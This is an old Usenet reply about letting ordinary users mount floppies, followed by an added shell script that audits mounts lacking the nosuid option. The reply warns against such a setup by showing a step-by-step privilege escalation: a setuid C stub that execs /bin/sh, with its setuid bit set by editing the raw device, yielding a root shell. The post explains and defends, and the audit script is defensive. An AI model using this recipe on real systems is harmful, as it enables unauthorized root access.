Path: utzoo!attcan!utgpu!jarvis.csri.toronto.edu!mailrus!uwm.edu!wuarchive!decwrl!orc!mipos3!omepd!merlyn
From: merlyn@iwarp.intel.com (Randal Schwartz)
Newsgroups: comp.unix.questions
Subject: Re: mounting and setuid question...
Message-ID: <5338@omepd.UUCP>
Date: 12 Dec 89 17:14:41 GMT
References: <23@gagme.uucp>
Sender: news@omepd.UUCP
Reply-To: merlyn@iwarp.intel.com (Randal Schwartz)
Organization: Stonehenge; netaccess via Intel, Hillsboro, Oregon, USA
Lines: 43
In-reply-to: gulik@gagme.uucp (Gregory Gulik)

In article <23@gagme.uucp>, gulik@gagme (Gregory Gulik) writes:
| Is it possible to set up a shell script that will
| allow non-super-user people to mount a floppy file system?

Yes... but...

| How should I be doing this?

... you shouldn't.  Mounting a trashed filesystem will take your system
down *real* fast.  I suppose you could run fsck on your to-be-mounted
floppy, and verify the exit status, but that sounds like a lot of
work, because it doesn't avoid the second problem... described as so:

(presume mountflop does an fsck followed by a mount, and umountflop
does the reverse).

    $ newfs /dev/flop
    $ mountflop
    $ cd /flop
    $ cat >x.c
    main() { setuid(geteuid()); exec("/bin/sh","sh",0); }
    ^D
    $ cc x.c -o x
    $ cd /
    $ umountflop
    $ emacs /dev/flop
    [find inode table, turn on setuid bit on ./x]
    $ mountflop
    $ /flop/x
    # [a root shell]

Sorry.  It's too easy.

(C code deliberately untested for security through obscurity.. :-)

Just another UNIX hacker,
-- 
/== Randal L. Schwartz, Stonehenge Consulting Services (503)777-0095 ====\
| on contract to Intel's iWarp project, Hillsboro, Oregon, USA, Sol III  |
| merlyn@iwarp.intel.com ...!uunet!iwarp.intel.com!merlyn                |
\== Cute Quote: "Welcome to Oregon... Home of the California Raisins!" ==/
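The following audit is an added example, not part of the original post: it flags removable-media mounts on which the kernel would still honour a setuid bit such as the one set on /flop/x above. It assumes the Linux /proc/mounts line format and the `nosuid` mount option, neither of which the post mentions; the function names, device prefixes and sample table are constructed for illustration.

```sh
#!/bin/sh
# Added example: list mounts that would honour a setuid bit on user-supplied media.
# Assumed input: Linux /proc/mounts lines: device mountpoint fstype options dump pass

# has_opt OPTIONS NAME: succeed only if NAME is a whole comma-separated token,
# so a substring match can never pass for the real option.
has_opt() {
    case ",$1," in
        *",$2,"*) return 0 ;;
        *)        return 1 ;;
    esac
}

# suid_honouring_mounts PREFIX... < mount-table
# Print the mount point of each entry whose device starts with one of the
# given prefixes and whose options lack "nosuid".
suid_honouring_mounts() {
    while read -r dev mnt fstype opts _rest; do
        [ -n "$opts" ] || continue            # skip blank or short lines
        for prefix in "$@"; do
            case "$dev" in
                "$prefix"*)
                    has_opt "$opts" nosuid || printf '%s\n' "$mnt"
                    break ;;
            esac
        done
    done
}

# Constructed sample table. The last entry carries a made-up option that
# merely contains the string "nosuid", to exercise whole-token matching.
sample_mounts() {
    cat <<'EOF'
/dev/sda1 / ext4 rw,relatime 0 0
/dev/flop /flop ext2 rw,relatime 0 0
/dev/fd1 /mnt/b vfat rw,nosuid,nodev,noexec 0 0
/dev/fd2 /mnt/c ext2 rw,nosuidx 0 0
EOF
}

# Audit the sample; on a live Linux system feed /proc/mounts instead:
#   suid_honouring_mounts /dev/fd /dev/flop < /proc/mounts
sample_mounts | suid_honouring_mounts /dev/fd /dev/flop
```

Any mount point this prints is one where a set-id binary prepared off-line on the media would run with its owner's privileges; mounting with `nosuid` (and usually `nodev`) closes that path regardless of what fsck reports.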